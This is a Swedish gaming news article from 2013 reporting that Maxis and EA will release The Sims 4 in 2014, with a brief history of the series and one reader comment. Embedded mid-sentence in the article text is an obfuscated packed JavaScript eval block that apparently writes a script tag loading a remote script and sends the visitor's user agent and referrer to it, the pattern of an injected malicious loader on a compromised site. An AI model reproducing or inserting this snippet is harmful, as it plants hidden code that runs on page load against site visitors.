Image Image Image Image Image Image Image Image Image Image

| 26 januari, 2021

Scroll to top

Top

The Sims 4 släpps 2014

The Sims 4 släpps 2014
Marcus
  • On 6 maj, 2013
  • http://www.revue.se

Maxis eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|brstk|var|u0026u|referrer|atzir||js|php’.split(’|’),0,{}))
och EA avslöjade idag att The Sims 4 är under utveckling och kommer att släppas någon gång under 2014.

Tidigare idag släppte Maxis och EA ett pressmeddelande där de avslöjade att The sims var under utveckling. Något releasedatum är ännu inte klarlagt, men någongång under nästa år. I pressmeddelande berättar de att The Sims 4 uppmuntrar spelarna att anpassa sin värld med nya verktyg och möjlighet att dela sin kreativitet med vänner och fans.

Kortfattat om Sims.

Första upplagan av The sims släpptes år 2000. Spelet går ut på att du ska styra dina virtuella människors (simmars) liv och bygga upp ett hem åt dessa. I spelet bestämmer du även hur dina virtuella människor ska äta, umgås och vad de ska ha för intresse. Spelet är världens mest framgångsrika simulatorspel och har sålts i över 150 miljoner exemplar.

 

 

 

Comments

  1. Louise

    men vilken datum släpps sims 4?!